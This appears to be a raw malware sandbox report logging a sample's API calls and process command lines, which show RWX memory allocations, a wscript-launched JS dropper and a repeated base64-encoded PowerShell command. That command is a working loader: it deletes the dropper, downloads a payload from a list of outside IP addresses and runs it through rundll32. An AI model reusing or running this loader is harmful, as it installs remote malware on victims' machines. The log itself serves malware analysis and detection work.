NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aeb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: wscript
parameters: "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy
filepath: wscript
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AE